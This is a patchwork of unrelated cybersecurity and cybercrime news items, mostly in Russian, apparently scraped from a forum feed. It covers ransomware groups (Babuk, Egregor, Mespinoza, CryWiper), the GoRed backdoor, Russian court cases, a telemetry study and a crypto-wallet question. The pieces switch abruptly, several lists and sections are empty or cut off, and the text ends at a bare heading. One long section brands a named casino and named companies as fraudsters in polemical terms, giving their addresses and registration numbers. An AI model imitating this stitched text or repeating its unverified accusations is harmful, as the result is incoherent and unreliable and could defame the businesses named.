• Полностью переработан и переписан код для маршрутизации и управления сеансами, что позволило увеличить пропускную способность и надёжность работы, особенно для узлов, часто меняющих пиры. В криптографических сеансах реализована периодическая ротация ключей. Добавлена поддержка маршрутизации по источнику (Source routing), которая может использоваться для перенаправления пользовательского IPv6 трафика. Переработана архитектура распределённой хэш- таблицы (DHT) и добавлена поддержка маршрутизации на основе DHT. Реализация алгоритмов маршрутизации вынесена в отдельную библиотеку.
• IP-адреса IPv6 теперь формируются из открытых ключей ed25519, а не их хэша X25519, что приведёт к смене всех внутренних IP после перехода на выпуск Yggdrasil 0.4.
• Предоставлены дополнительные настройки для поиска Multicast-пиров.
Academic research published last week looked at the telemetry traffic sent by modern iOS and Android devices back to Apple and Google servers and found that Google collects around 20 times more telemetry data from Android devices than Apple from iOS.
The research, conducted by Professor Douglas J. Leith from Trinity College at the University of Dublin, analyzed traffic originating from iOS and Android devices heading to Apple and Google servers at various stages of a phone’s operation, such as data shared:
Prof. Leith said the research took into account that data could be collected by the operating system itself and by default apps provided by the OS makers —such as search (Siri, OkGoogle), cloud storage (iCloud, Google Drive), maps/location services (Apple Maps, Google Maps), photo storage/analytics (ApplePhoto, Google Photos)— and kept the two sources separate, focusing only on the operating systems’ telemetry, left in their default states.
The study unearthed some uncomfortable results. For starters, Prof. Leith said that “both iOS and Google Android transmit telemetry, despite the user explicitly opting out of this [option].”
Furthermore, “this data is sent even when a user is not logged in (indeed even if they have never logged in),” the researcher said.
The table below summarizes the main data points that test handsets sent to
Apple and Google servers.
But while the Irish researcher found that Apple tends to collect more
information data types from an iOS device, it was Google that collected “a
notably larger volume of handset data.”
“During the first 10 minutes of startup the Pixel handset sends around 1MB of data is sent to Google compared with the iPhone sending around 42KB of data to Apple,” Prof. Leith said.
“When the handsets are sitting idle the Pixel sends roughly 1MB of data to Google every 12 hours compared with the iPhone sending 52KB to Apple i.e., Google collects around 20 times more handset data than Apple.”
This data collection process takes place every 264 seconds on idle Apple devices and once 255 seconds on Android smartphones — which roughly equates to almost every four and a half minutes even when the handset is not being used.
But in addition to the idle state, the Irish researcher said that both operating systems also share data with their central servers when users are browsing their settings screens.
Furthermore, when a new SIM card is inserted into both iOS and Android devices, SIM details are shared with both Apple and Google almost immediately.
But Prof. Leith said that he also observed a number of pre-installed apps and services also making connections to both Apple and Google servers even before the apps were opened or used.
“In particular, on iOS these include Siri, Safari and iCloud and on Google Android these include the Youtube app, Chrome, Google Docs, Safety hub, Google Messaging, the Clock, and the Google Search bar,” Prof. Leith said.
The University of Dublin professor says that this expansive data collection raises at least two major concerns. First, that the telemetry can be used to link physical devices to personal details, data that both companies are most likely exploiting for advertising purposes.
Second, that the telemetry collection process allows the OS makers to track users’ location based on the IP address that connects and uploads device telemetry to their servers.
The researcher said that currently, there are very few, if any, realistic options for users to prevent telemetry collection from their devices.
The Irish professor said he contacted both companies with his findings. Apple did not respond, while Google sent clarifications, which he incorporated into the paper. Google also told Prof. Leith that they intended to publish public documentation on the telemetry data they collect, but did not provide a date or deadline.
But in an email response on Monday, a Google spokesperson played down the paper’s findings, and claimed the researcher found legitimate telemetry data that helps keep devices running smoothly.
This research outlines how smartphones work. Modern cars regularly send basic data about vehicle components, their safety status and service schedules to car manufacturers, and mobile phones work in very similar ways. This report details those communications, which help ensure that iOS or Android software is up to date, services are working as intended, and that the phone is secure and running efficiently.
Click to expand...
Google spokesperson
Click to expand...
In addition, according to a Google source familiar with the research paper’s review, the Android maker also disputed the paper’s methodology, which they claim under-counted iOS’ telemetry volume by excluding certain types of traffic, which Google believes resulted in skewed results that found Android devices collecting 20 times more data than iOS.
In a response after this article’s publication, Apple echoed its rival’s response.
“The report conflates a number of items in relation to different services and misunderstands how personal location data is protected,” an Apple spokesperson told The Record. “Apple is not collecting data that can be associated with individuals without a user’s knowledge or consent.”
Additional details are available in a research paper titled “ Mobile Handset Privacy: Measuring The Data iOSand Android Send to Apple And Google ,” available as a downloadable PDF document.
Last year, in March 2020, the same professor also published a study analyzing the telemetry collected by web browsers. The study [PDF] found that Brave collected the smallest amount of data, while Microsoft’s Edge and the Yandex Browser were at the opposite side of the spectrum.
[https://therecord.media/google-coll...try-from-android-devices-than-apple- from-ios/](https://therecord.media/google-collects-20-times-more-telemetry- from-android-devices-than-apple-from-ios/)
Федеральной службой безопасности Российской Федерации совместно с МВД России пресечена и расследована деятельность преступного сообщества, участники которого осуществили серию краж денежных средств из банкоматов одной из кредитных организаций на территории Ставропольского края.
Решением Промышленного районного суда г. Ставрополя организатор преступного сообщества - Гриневич М.П. приговорен к лишению свободы сроком на 16 лет с отбыванием наказания в колонии строгого режима за совершение преступлений, предусмотренных ч. 1 ст. 210 и ч. 4 ст. 158 УК России. Остальным участникам - Юрлову А.А., Чистякову П.В., Шипиловских М.И., Кушнареву Д.О., Васильеву A.M., Зырянову В.А., Внутских К.А., Вылегжанину А.Д. назначены наказания в виде лишения свободы на срок от 6,5 до 9 лет с отбыванием наказания в колонии общего режима.
В 2018 году преступники осуществили несанкционированный доступ к компьютерной сети ставропольского банка, что позволило им беспрепятственно завладеть наличными средствами из 22 банкоматов.
В ходе совместной операции ФСБ и МВД России, в которой приняли участие более 100 сотрудников силовых ведомств, в мае 2019 года на территории Ставропольского, Краснодарского и Пермского краев, г. Москвы, г. Санкт- Петербурга и Новосибирской области проведены обыски и задержания членов группы. У преступников изъято 12,5 млн рублей наличными, 567 банковских карт, на счетах которых находилось более 450 млн рублей, а также большое количество средств связи и компьютерной техники со следами противоправной деятельности.
В результате проведенной спецоперации удалось предотвратить хищение более 1,1 млрд рублей с корреспондентского счета ставропольской кредитной организации в Центробанке.
Сотрудники полиции ГУ МВД России по г. Санкт-Петербургу и Ленинградской области в результате проведения комплекса оперативно-розыскных мероприятий задержали в Челябинске 20-летнего учащегося электротехнического колледжа. Он подозревается в хищении денежных средств у жителей различных регионов страны с использованием созданных им сайтов-двойников известных торговых интернет- площадок.
По версии полицейских, злоумышленник, выступая в роли покупателя, предлагал откликнувшимся продавцам воспользоваться сервисами «Безопасная сделка» и «Доставка». Получив согласие, он отправлял им фишинговую ссылку на свой ресурс, имитирующий настоящую онлайн-платформу.
После того как человек заполнял на сайте-двойнике форму для последующих безналичных расчётов, вводил необходимые данные банковских карт и присланный ему код из СМС-сообщения, с его счёта происходило многократное списание финансов.
В настоящее время оперативникам удалось установить причастность подозреваемого не менее чем к 70 эпизодам противоправной деятельности, ущерб от которой составил порядка полумиллиона рублей.
Следователем следственного отдела УМВД России по Красносельскому району г. Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного п. «г» ч. 3 ст. 159 Уголовного кодекса Российской Федерации.
B ходе проведения обыска в квартире фигуранта изъято восемь банковских карт, два мобильных телефона и ноутбук. Злоумышленнику избрана мера пресечения – заключение под стражу.
Сотрудниками полиции проводятся оперативно-розыскные мероприятия по установлению дополнительных эпизодов преступной деятельности задержанного.
В последнее время на просторах Интернета наблюдается всплеск активности всевозможных крипто казино, многие из которых на деле оказываются откровенной аферой.
Реклама бонусов, подозрительно щедрых акций, вариантов сказочного кэшбэка просто кричат: “Мы здесь не ради заработка. Мы создали казино, чтобы отдать все свои деньги вам, нашим клиентам!”. Даже если ты гражданин страны, где азартные игры вне закона и тебе очень хочется играть - это не проблема. Достаточно наличия электронной почты и клондайк у ваших ног. Главное дать вам возможность делать депозит, крутить барабан или тасовать карты. Но, если вдруг вам улыбнулась фортуна выиграть деньги, на смену воодушевляющим крикам и улыбкам придет малоприятная гримаса лживого радушия.
Одним из ярких представителей, не чистых на руку компаний, часто мелькающих на просторах сети, причем в негативном контексте, является Bitstarz. Это вид бизнеса, существующего по принципу: «Покуда есть на свете дураки, обманом жить нам, стало быть, с руки...».
Скам казино Bitstarz ведет свою бурную деятельность под крылом Softswiss и Dama N.V. Компания Softswiss, являющаяся разработчиком программного обеспечения для iGaming, отвечает за разработку приложений, предоставление сублицензии и обработку платежей. Dama N.V., “зарегистрированная” в офшорной дыре, ставшей раем для различного рода мошенников - Кюрасао, занимается управлением. Судя по всему, обе компании напрямую участвуют в мошеннических схемах BitStarz.
Схема аферы проста, стара и работает в одном ключе - создать прецедент, чтобы отказать вам в получении выигрыша. К примеру, внезапно обнаруживаются 2-3 “подозрительных” аккаунта, зарегистрированных вами. Но даже если они принадлежат вам, остается загадкой то, каким образом это влияет на игру в слоты. Также причиной отказа в выводе денежных средств может послужить внезапная просьба пройти абсурдную процедуру KYC. Причем, когда вы вносите депозит на аккаунт, у представителей BitStarz не возникает даже мысли, что вам необходимо пройти данную процедуру.
Еще одним признаком мошенничества с вашей стороны для казино может неожиданно стать использование VPN-сервиса. Естественно, в процессе регистрации служба поддержки клиентов Bitstarz клянется в том, что VPN сервисы помогут избежать сложностей с блокировкой, если в стране вашего пребывания деятельность казино аферистов не регулируется законодательством. К тому же, по их словам, это никак не отразится на самой игре, а также на выводе денег.
Вот наглядный пример жульничества, который предоставил один из пострадавших граждан Израиля, где игорный бизнес находится вне закона. На скринах внизу видно, что BitStarz предоставляет возможность не только зарегистрироваться, но и сделать депозит. При этом, даже VPN не требуется!
BitStarz прекрасно знает, что по законодательству государства Израиль, не имеет права предоставить вам данную услугу, однако, все же разрешает регистрацию. Но стоит вам выиграть денег и вы попытаетесь вывести выигрыш, как сразу же придет уведомление о том, что вы не имеете права на вывод своего выигрыша, так как юрисдикция вашего государства этого не позволяет. Мошенники в лице Bitstarz готовы принимать ваши деньги в любых количествах, без мудреных проверок, документов, с VPN и без. На выводе им что-то всегда начинает “мешать”.
BitStarz - это скам-казино, которое наглым образом обкрадывает игроков по всему миру, стоит только вам выиграть там деньги. Помогает им в этой афере достаточно известная управляющая компания Dama N.V. и разработчик ПО Softswiss, которых также смело можно назвать мошенниками.
**************
Мошенническое криптовалютное казино BitStarz уютно расположилось в оффшорной зоне Кюрасао - государства, расположенного на юге Карибского моря, ближе к Венесуэле, где, грубо говоря, никто не станет “проверять документы” и уточнять происхождение средств на счету аферистов.
Одними из самых частых жалоб со стороны клиентов скам-казино BitStarz стали проблемы с выводами. Как только клиентам начинает улыбаться фортуна и они хотят снять честно выигранные средства, команда BitStarz придумывает настолько абсурдную процедуру KYC, которая способна поразить своей неадекватностью даже американскую SEC, регулярно мониторящую криптовалюты с особой жесткостью.
Требование сделать селфи с паспортом, сфотографировать себя со свежим выпуском газеты, по адресу прописки, рядом с родной улицей, домом, дверью, номером вашей квартиры и прозвон всех ваших родственников вплоть до пятого колена, прикрываясь вопросом “безопасности” - это лишь малая доля того маразма, с которым сталкиваются клиенты BitStarz. Скамеры не останавливаются ни перед чем в попытке отказать пострадавшим в выводе их выигрышей.
По этой причине некоторые клиенты собираются в группы и даже подают коллективные иски против скам-казино BitStarz в надежде, что суд вынесет справедливый вердикт. Однако, рассмотрение подобных процессов против мошенников может затянуться на несколько лет и неизвестно - удастся ли им вернуть утраченную сумму, либо к тому моменту эта шарашкина контора уже и вовсе закроется.
Забавно, что на момент регистрации обманщики из BitStarz без проблем позволяют клиентам пользоваться VPN. Но, если в вашей стране деятельность данного криптоказино не регулируется законодательством и компания не имеет лицензии, на вывод выигрыша вряд ли вообще стоит рассчитывать.
Почему? По версии BitStarz, вся проблема кроется именно в использовании клиентами VPN-сервисов. Но даже зная об этом факте, они постоянно обманывают потребителей, а служба поддержки заверяет, что игра с включенным VPN не вызовет никаких проблем с выводами. С другой стороны, звучит логично, ведь нет вывода - нет проблем!
Суммы потерь в отзывах, мелькающих на таких популярных ресурсах, как Trustpilot, Bitcointalk и многих других варьируются от нескольких десятков тысяч рублей до нескольких сотен тысяч долларов. Так, один из клиентов, оставивших отзыв, пожаловался на то, что мошенническое криптоказино BitStarz отказалось вывести на его кошелек 4 BTC, эквивалентные на текущий момент 152 000 долларов.
Казалось бы, после таких афер эту компанию давно пора прикрыть, но нет - она “успешно” существует еще с 2014 года и сегодня находится под крылом компании Dama N.V., зарегистрированной по адресу Julianaplein 36, Виллемстад, Кюрасао, а регистрационный номер мошенников - 152125.
Помимо скамеров Dama N.V. в мошеннической схеме также участвует их дочерняя компания Friolion Limited, зарегистрированная по адресу Pavlov Nirvana & Aipeias, 4, ALPHA TOWER, этаж 1, помещение 11, 3021, Лимасол, Кипр с регистрационным номером HE 419102.
Мы еще не раз вернемся к теме мошеннических казино и BitStarz является среди них эталоном того, как криптовалютное казино может годами игнорировать критические проблемы клиентов и тысячи гневных отзывов в сети, наотрез отказываясь выводить выигранные ими деньги.
Центральный полицейский департамент округа Колумбии сообщил о взломе и возможной утечке данных, после того как на сайте вымогателя Babuk Locker были опубликованы скриншоты внутренних файлов с серверов департамента.

«Нам известно о несанкционированном доступе к нашему серверу. Мы определяем степень серьезности инцидента и продолжаем анализировать действия [преступников], а также привлекли ФБР для расследования случившегося», — сообщают в полиции округа Колумбия.
Click to expand...
Операторы Babuk Locker заявляют, что взломали внутреннюю сеть правоохранителей и похитили 250 Гб данных. На своем сайте вымогатели опубликовали скриншоты различных папок, которые были похищены во время атаки. Судя по названиям, эти папки содержат множество файлов, связанных с полицейскими операциями, дисциплинарными записями и файлами, относящимися к членам банд и преступных группировок.



Хакеры предупреждают, что у полиции есть три дня, чтобы связаться с ними и заплатить выкуп. В противном случае злоумышленники угрожают связаться с членами банд, фигурирующих в документах, и предупредить их о полицейских информаторах.
Babuk Locker — весьма молодой вымогатель. Впервые он был замечен в январе 2021 года, но за прошедшие месяцы уже успел атаковать некоторые крупных компаний, включая испанскую сеть розничной продажи телефонов Phone House и баскетбольный клуб Houston Rockets.
На прошлой неделе эксперты компании Emsisoft предупредили, что дешифровщик хакеров содержит опасные ошибки, которые могут привести к уничтожению файлов жертвы. Несколько дней спустя авторы Babuk Locker сообщили на хакерском форуме, что они исправили эту ошибку.
Источник: xakep.ru/2021/04/27/mpd-hack/
Авторы законопроекта предлагают обращать в собственность государства средства, полученные от совершения преступлений в сфере компьютерной информации. Их могут направить на возмещение ущерба потерпевшим
Группа депутатов и сенатор внесли в Госдуму законопроект, которым предлагается дополнить перечень преступлений, за совершение которых изымают нелегально приобретенное имущество. В него предлагается включить киберпреступления. Документ есть в электронной базе данных нижней палаты парламента.
Авторы — депутаты Василий Пискарев, Эрнест Валеев, Анатолий Выборный (все — «Единая Россия») и сенатор Андрей Клишас — предлагают внести дополнение в ст. 104.1 УК «Конфискация имущества». Она определяет конфискацию как «принудительное безвозмездное изъятие и обращение в собственность государства на основании обвинительного приговора <...> имущества», полученного в результате совершения ряда преступлений.
К ним предполагается добавить преступления в сфере компьютерной информации, в том числе неправомерный доступ к такой информации (ст. 272 УК), создание, использование и распространение вредоносных компьютерных программ (ст. 273 УК), нарушение правил эксплуатации средств хранения, обработки или передачи компьютерной информации и информационно-телекоммуникационных сетей (ст. 274 УК) и другие.
Сейчас конфискация имущества возможна за убийство с отягчающими обстоятельствами, умышленное причинение тяжкого вреда здоровью с отягчающими обстоятельствами, изготовление и сбыт поддельных денег, совершение теракта, хищение или вымогательство наркотиков, госизмену и другие преступления.
В пояснительной записке к законопроекту говорится, что поручение разработать соответствующие нормы было дано парламенту по итогам совещания Совета безопасности, прошедшего в марте. Авторы также приводят данные МВД, согласно которым в 2021 году было совершено на 62,5% больше преступлений в сфере компьютерной информации, чем в предыдущем году (6354 против 3973). Большая часть преступлений этой категории в прошлом году предполагала неправомерный доступ к компьютерной информации (5,9 тыс.).
Согласно статистике МВД, с января по сентябрь 2022 года в России было зарегистрировано 6655 преступлений в сфере компьютерной информации, что на 40,8% больше, чем за аналогичный период прошлого года. На неправомерный доступ к такой информации пришлось 5965 преступлений (на 35,5% больше, чем в прошлом году).
Депутат, глава комитета по безопасности и противодействию коррупции Василий Пискарев отметил, что в последнее время наблюдается «активное проникновение криминала в информационные технологии и телекоммуникации, рост мошенничества в кредитно-финансовой сфере». «В результате растет количество потерпевших граждан, особенно пожилого возраста, наносится большой материальный ущерб», — добавил он (слова Пискарева РБК передал его представитель).
Он также отметил, что введение конфискации имущества, полученного путем совершения киберпреступлений, позволит направить его на возмещение ущерба потерпевшим.
В феврале компания RTM Group в своем исследовании, посвященном мошенничеству в интернете, утверждала, что сумма ущерба от действий телефонных и интернет- мошенников в 2021 году превысила 150 млрд руб. При этом в компании подчеркивали, что данные о размерах ущерба в результате хищений при помощи интернет-технологий разнятся в зависимости от источников, «но при этом остаются весьма высокими».
Сенатор, глава комитета по конституционному законодательству и госстроительству Андрей Клишас уточнил, что предложенная им и депутатами поправка будет способствовать в том числе предотвращению преступлений, связанных с утечкой и продажей персональных данных граждан, распространением вредоносного ПО и неправомерным воздействием на критическую информационную инфраструктуру России. Его комментарий распространила пресс-служба Совфеда.
source: rbc.ru/politics/18/11/2022/637754c89a79479b2c8214f5
В Роттердаме суд приговорил к 18 месяцам тюрьмы россиянина Дмитрия К., обвиняемого в поставках микрочипов в Россию в обход санкций ЕС. Его компания должна выплатить штраф в размере 200 тыс. евро. Нидерландский гражданин в такой ситуации скорее всего отделался бы санкциями и штрафами.
В тюрьму за чипы
Окружной суд Роттердама приговорил к 18 месяцам тюрьмы 55-летнего Дмитрия К., а его компанию — к штрафу в размере 200 тыс. евро.
Осужденного признали виновным в нарушении санкции ЕС против России, касающихся экспорта электронных товаров двойного назначения, в том числе микрочипов. Эти товары «могли бы способствовать военному усилению российских компаний», говорится в постановлении суда, с которым ознакомились РИА «Новости».
У Дмитрия двойное гражданство — России и Нидерландов. Его фамилия не разглашается. Арестован он был в сентябре 2022 г.
Приговор оказался мягче требований обвинения. Прокуратура Нидерландов настаивала на трех годах заключения и штрафе в 350 тыс. евро.
Подсканкционная деятельность
По версии следствия Дмитрий поставлял российским компаниям электронные товары двойного назначения, которые могли использоваться для работы ВПК России. Одним из заказчиков осужденного был «Ростех», выяснило радио «Бизнес FM».
Страна назначения скрывалась. По документам электроника и чипы отправлялись на Мальдивы и в другие страны. Таким образом в Россию было продано за семь месяцев товаров на общую сумму в 1,4 млн евро.
Предвзятый приговор
Адвокат приговоренного россиянина утверждает, что в деле нет никаких доказательств того, что товары, направленные в Россию, были использованы для военных целей.
Полтора года тюрьмы за построенное лишь на предположениях и неочевидное правонарушение — это очень много. Такое, вероятно, связано с тем, что Дмитрий, помимо нидерландского, имеет еще и гражданство России, сказал «Бизнес FM» эксперт в области международного и американского права Александр Трещев.
Эксперт считает, что голландца никто не привлек бы к уголовной ответственности в такой ситуации. В худшем случае наложили бы санкции на компанию или присудили дополнительный штраф.
«Но мы живем в странное время и в странном мире, где основные права и постулаты нарушаются. Если раньше каждый считался честным, пока не будет доказано обратное, то мы не заметили, как практически все фемиды западных стран переложили бремя доказывать свою невиновность на подозреваемого, вместо того чтобы правоохранители собирали доказательную базу», — отметил Трещев.
Количество таких дел растет
Запрет на экспорт критических технологий и промышленных товаров, включая электронику, вошел в десятый пакет санкций ЕС против России. Количество дел против россиян за обход этих ограничений растет.
В сентябре 2023 г. CNews писал об аресте в США Максима Марченко по обвинению в закупках санкционной электроники двойного и военного назначения. В конце августа 2023 г. федеральный суд ФРГ выдал ордер на арест Вальдемара В. за поставку электронных компонентов в Россию.
Тоже в августе на Кипре по запросу США арестовали Артура Петрова за поставку для российской компании «большого объема микроэлектронного оборудования». 30 октября 2023 г. ТАСС сообщил, что Окружной суд Ларнаки отказал в освобождении Петрова под залог из-за каких-то случаев, когда освобожденные под залог бежали из страны. Какие именно случаи послужили причиной отказа, не уточняется.
CryWiper ликвидирует содержимое файлов всех форматов, за исключением тех, что
отвечают за работу самой системы. Среди основных целей вируса — базы данных,
архивы.
Мэрии и суды в нескольких регионах России атаковал новый вирус-шифровальщик —
CryWiper. Об этом сообщили «Известия» со ссылкой на экспертов «Лаборатории
Касперского».
«После заражения устройства CryWiper портил файлы и отображал сообщение с
требованиями выкупа», - уточнил эксперт по кибербезопасности «Лаборатории
Касперского» Федор Синицын.
Специалист указал, что в записке злоумышленники оставляли email и биткойн-
адрес кошелька, указав сумму за расшифровку более полумиллиона рублей.
Однако при оплате программа не восстанавливает файлы — они удаляются без
возможности восстановления. Вместе с тем эксперт подчеркнул, что последствия
представляют из себя изначальный замысел разработчика вируса и не являются
какой-либо ошибкой.
Эксперт также отметил, что CryWiper ликвидирует содержимое файлов всех
форматов, за исключением тех, что отвечают за работу самой системы. Среди
основных целей вируса — базы данных, архивы.
По мнению главы департамента информационно-аналитических исследований компании
T.Hunter Игоря Бедерова, распространение подобного рода атак на российские
органы власти связано со сложной геополитической обстановкой.
Специалисты Positive Technologies выявили ранее [неизвестный бэкдор](https://www.ptsecurity.com/ru-ru/about/news/positive-technologies- vyyavila-novyj-bekdor-v-arsenale-aktivnoj-v-rossii-gruppirovki-ex-cobalt/), написанный на Go. Малварь используется хак-группой ExCobalt, которая атакует российские организации.
Как рассказывает Денис Кувшинов, руководитель отдела исследования киберугроз экспертного центра безопасности Positive Technologies, в марте 2024 года, во время расследования инцидента исследователи обнаружили одном из Linux-узлов клиента файл с названием scrond, сжатый с помощью упаковщика UPX (Ultimate Packer for eXecutables).
В данных распакованного семпла, написанного на Go, обнаружились пути пакетов,
содержащие подстроку red.team/go-red/. Из-за этого специалисты предположили,
что семпл является проприетарным инструментом GoRed от некой Red Team.

Однако упомянутый сайт выглядел как типичная визитка и практически не
использовался создателями. Вся информация была датирована 2019 годом, а дизайн
сайта выглядел типовым, похожим на многие подобные ресурсы.
В процессе дальнейшего анализа GoRed выяснилось, что несколько версий этой программы уже встречали ранее во время реагирования на инциденты у ряда других клиентов.
Дальнейший анализ позволил установить связь инструмента с группировкой ExCobalt, об атаках которой эксперты [рассказывали ](https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/uzhe- ne-te-ataki-ex-cobalt-na-rossijskie-kompanii-v-2023-godu/)в ноябре прошлого года. Еще тогда в отчете упоминался домен lib.rpm-bin.link, при энумерации директорий которого было получено множество инструментов, включая col — первую версию GoRed.
Хак-группа ExCobalt существует с 2016 года и известна атаками на российские компании в сферах металлургии, телекоммуникаций, горной промышленности, ИТ и госсектора, а также занимается кибершпионажем и кражей данных.
Новый бэкдор, названный по имени изначально обнаруженного семпла — GoRed, имеет множество функций, включая:
Специалисты заключают, что ExCobalt продолжает активно атаковать российские компании, улучшая свои методы и инструменты, включая бэкдор GoRed. К примеру, исследование показало, что хакеры расширяют функциональность GoRed для более сложных и скрытных атак и кибершпионажа.
Arrested suspects are believed to be clients of the Egregor RaaS, not the
Egregor gang itself.
Members of the Egregor ransomware cartel have been arrested this week in
Ukraine, French radio station [France
Inter](https://www.franceinter.fr/amp/justice/cybersecurite-des-pirates-
egregor-a-l-origine-de-l-attaque-contre-ouest-france-interpelles-en-ukraine)
reported on Friday, citing law enforcement sources.
The arrests, which have not been formally announced, are the result of a joint investigation between French and Ukrainian police.
Sources in the threat intel community have confirmed the existence of a law enforcement action but declined to comment for the time being.
The names of the suspects have not been released. France Inter said the arrested suspects provided hacking, logistical, and financial support for the Egregor gang.
The Egregor gang, which began operating in September 2020, operates based on a Ransomware-as-a-Service (RaaS) model. They rent access to the actual ransomware strain, but they rely on other cybercrime gangs to orchestrate intrusions into corporate networks and deploy the file-encrypting ransomware.
Victims who resist paying the extortion fee are often listed on a so-called
"[leak site](https://www.zdnet.com/article/heres-a-list-of-all-the-ransomware-
gangs-who-will-steal-and-leak-your-data-if-you-dont-pay/)," in the hopes of
shaming them into paying the ransom demand. Victims who don't pay often have
internal documents and files shared on the Egregor leak site as punishment.
If victims do pay the ransom demand, the gang which orchestrated the intrusion
keeps most of the funds, while the Egregor gang takes a small cut. The gang
then launders these profits through the Bitcoin ecosystem via Bitcoin mixing
services.
According to the France Inter report, the arrested suspects are believed to some of these "affiliates" (or partners) of the Egregor gang, which help prop up its operations.
France Inter said French authorities got involved in the investigation after several major French companies were hit by Egregor last year, such as game studio [Ubisoft](https://www.zdnet.com/article/ubisoft-crytek-data-posted-on- ransomware-gangs-site/) and logistics firm [Gefco](https://www.lemagit.fr/actualites/252489533/Gefco-pris-a-son-tour- dans-la-tourmente-dune-cyberattaque-majeure).
An investigation was started last year, and French police, together with "European counterparts," were able to track down Egregor members and infrastructure to Ukraine.
While, at the time of writing, details about the law enforcement action are murky, the arrests appear to have had a pretty big impact on Egregor operations.
"Recorded Future has observed that Egregor infrastructure, including their extortion site and command and control (C2) infrastructure, has been offline since at least Friday," Allan Liska, a security researcher for threat intelligence firm Recorded Future, has told ZDNet in an email.
"While there has been no police banner, as there often would be in this case, it is unusual for ransomware actors as well-resourced as Egregor to have all of their infrastructure go offline at the same time," he added.
The arrests in Ukraine have hit one of last year's most active ransomware operations.
While the Egregor RaaS formally launched in September 2020, many security experts believe the Egregor gang is actually the older Maze ransomware group, which began operating in late 2019.
The Maze gang abruptly shut down in September 2020, a few weeks after Egregor began operating. Reports from threat intelligence firms at the time said that the Maze gang had privately notified many of its top "affiliates" to move over to the Egregor RaaS.
Currently, many security researchers believe the Egregor RaaS is an [upgraded and rebranded version of the older Maze operation](https://news.sophos.com/en- us/2020/12/08/egregor-ransomware-mazes-heir-apparent/).
"Recorded Future has tracked 206 victims published to the Egregor extortion site and, before the switchover, 263 victims published to the Maze site," Liska told ZDNet.
"The two variants combined accounted for 34.3% of victims published to all ransomware extortion sites (14.9% Egregor)," Liska said.
A [Coveware report](https://www.coveware.com/blog/ransomware-marketplace- report-q4-2020) published last month confirmed Recorded Future's assessment, listing Egregor as the second most active ransomware gang for Q4 2020.
However, it is unclear what the damage of this week's law enforcement action will be on Egregor's future. Last month, US and Bulgarian authorities [disrupted the Netwalker ransomware gang](https://www.zdnet.com/article/us- and-bulgarian-authorities-dirsupt-netwalker-ransomware-operation/) by seizing servers and arresting one of its affiliates, and the RaaS service has been inactive ever since.
A Chainalysis report published at the start of the month listed the Egregor/Maze gang as [one of the top 5 earners](https://www.zdnet.com/article/ransomware-gangs-made-at- least-350-million-in-2020/) in the ransomware landscape, with earnings between $40 million and $50 million.
This was confirmed by Liska, who told ZDNet that Egregor's average ransom demand was around $700,000, making it among the largest ransom demands of any ransomware family.
But a pretty significant event took place last year, in November, when the operators of the REvil (Sodinokibi) ransomware gang (#1 on that Coverware 2020 Q4 ransomware report) claimed to have identified the real identities of the persons behind the Maze service, their rival.
#REvil has claimed to have information that exposes the actors behind #Maze/#Egregor and that they are directly connected with the Russian government - that #EvilCorp, #Maze, etc. are all one group operated by 8 people involved with the FSB. pic.twitter.com/Y7votbk1pP
— pancak3 (@pancak3lullz) November 30, 2020Click to expand...
At the time, security analysts considered the REvil stunt as an attempt to sabotage a rival's public image, but nobody commented on the accuracy of the dox, and ZDNet was told several of them shared the information with law enforcement agencies.
A serious security breach exposed the information of, it is believed, all customers of the iugu services company, which operates in Brazil through financial management and automation systems. Users’ personal, banking and transaction data was available on an unprotected server for at least an hour.
The discovery is by security expert and consultant Bob Diachenko, who, through Twitter , reveals a very serious incident.
В результате проведения комплекса оперативно-розыскных мероприятий, полицейские совместно с сотрудниками регионального УФСБ установили причастность 27-летнего жителя города Горячего Ключа в распространении вредоносных компьютерных программ на популярных сайтах в сети Интернет.
По данным следствия, подозреваемый приобрел во временное пользование за денежное вознаграждение вредоносные компьютерные программы, которые распространял путем размещения на ссылках к видеороликам на популярных сайтах. Как только пользователь переходил по ссылке, в его компьютер проникал вирус, который копировал все логины и пароли, сведения о банковских и криптовалютных счетах. Таким образом, злоумышленник похищал всю конфиденциальную информацию пользователей и размещал эти сведения на площадках даркнета.
В отношении злоумышленника следственным отделением ОМВД России по городу Горячий Ключ возбуждено уголовное дело по признакам преступления, предусмотренного частью 1 статьи 273 УК РФ «Создание, использование и распространение вредоносных компьютерных программ». Санкциями указанной части статьи предусмотрено максимальное наказание в виде 4 лет лишения свободы.
Из за скачков курса, с трастваллета ( юсдт ) не ходят сенды на ряд биржевых
кошелей.
Проблема в комиссиях, кои не изменишь, на иные холодные кошели - без проблем.
Именно сегодня.
ТРХ доливал, стейкал, все равно, только на холодные.
Кто еще сталкивался?
Группировка Mespinoza/PYSA, которая, по мнению экспертов, происходит из Франции, почти два года атаковала организации в США и других странах. В марте 2021 г. к ней проявило интерес ФБР. С апреля на сайте утечек Mespinoza перестали появляться новые данные.
Почти незаметный шифровальщик
Эксперты группы Unit 42 Palo Alto Network опубликовали исследование, посвященное малоизвестной до последнего времени группировке шифровальщиков- вымогателей под названием Mespinoza. На фоне более знаменитых групп, таких как RagnarLocker или канувших в неизвестность REvil и DarkSide, Mespinoza оставалась относительно непримечательной сущностью. Хотя со своих жертв эта группировка требовала довольно большие деньги за возвращение доступа к данным.
Группировка Mespinoza, также известная как PYSA, атаковала организации в таких отраслях как образование, производство, ритейл, медицина, хай-тек, транспорт и логистика, инженерные разработки и соцслужбы. Доставалось и государственным агентствам.
Еще в марте 2021 г. ФБР опубликовало предупреждение об активности PYSA, отметив, что масштаб и охват деятельности этой группировки растет. С тех пор злоумышленники действительно развернулись на широкую ногу. Жертвами Mespinoza/PYSA стали организации в 20 странах, в том числе в Канаде, Великобритании, Италии, Испании, Франции, Германии, Южной Африке, Бразилии и Австралии. Больше половины жертв, впрочем, располагаются на территории США.
Злоумышленники требовали от своих жертв до $1,6 млн. Впрочем, максимальная известная выплата составила $470 тыс. Если выкуп не выплачивался, группировка выкладывала данные жертв на своем сайте утечек.
Как отмечается в исследовании Unit 42, группировку Mespinoza отличает весьма высокая организационная дисциплина. Это вполне может указывать на то, что мотивы ее участников не ограничиваются заработком денег.
Modus Operandi
